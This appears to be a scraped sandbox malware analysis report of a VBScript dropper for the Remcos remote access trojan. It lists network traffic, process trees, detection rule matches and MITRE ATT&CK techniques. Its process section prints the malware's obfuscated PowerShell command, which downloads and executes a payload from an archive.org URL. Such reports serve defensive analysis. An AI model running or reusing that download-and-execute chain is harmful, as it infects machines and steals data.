Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
Apr 21, 2021 15:36:54.392797947 CEST	207.241.228.140	443	192.168.2.6	49722	CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Mon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
Apr 21, 2021 15:37:00.292644978 CEST	207.241.227.121	443	192.168.2.6	49727	CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Mon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 6572 Parent PID: 3440

General

Start time:	15:36:32
Start date:	21/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'
Imagebase:	0x7ff664360000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 6632 Parent PID: 6572

General

Start time:	15:36:33
Start date:	21/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Imagebase:	0x7ff743d60000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 6648 Parent PID: 6632

General

Start time:	15:36:34
Start date:	21/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 6868 Parent PID: 6632

General

Start time:	15:37:09
Start date:	21/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
Imagebase:	0x7ff743d60000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: aspnet_compiler.exe PID: 6984 Parent PID: 6868

General

Start time:	15:37:16
Start date:	21/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x960000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, Author: unknown
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Appraisa.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Remcos

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre